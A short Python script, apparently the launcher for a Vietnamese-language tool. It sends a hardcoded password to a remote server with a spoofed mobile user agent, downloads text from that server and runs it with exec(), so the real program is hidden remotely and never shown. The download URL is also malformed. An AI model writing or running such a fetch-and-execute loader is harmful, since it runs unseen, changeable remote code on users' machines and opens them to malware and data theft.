
import os, sys
import socket
import time
import threading
import pystyle
import requests
import bs4

def network():
    try :
        socket.create_connection(("1.1.1.1",53 ))
        return True 
    except OSError :
        pass
    return False

try:
     code=requests.post('https://https://taokey567.c25tool.net/src/srctool.txt',headers={'user-agent':'Mozilla/5.0 (Linux; Android 11; Live 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.28 Mobile Safari/537.36'} ,data={'matkhau':'tothichcauvl2024'}).text 
except:
    if not network():
        print('Hãy Kiểm Tra Kết Nối Mạng !!! ')
    else :
        print('Sever Gặp Lỗi Hãy Liên Hệ Admin !!! ')
    exit()

exec(code, globals())
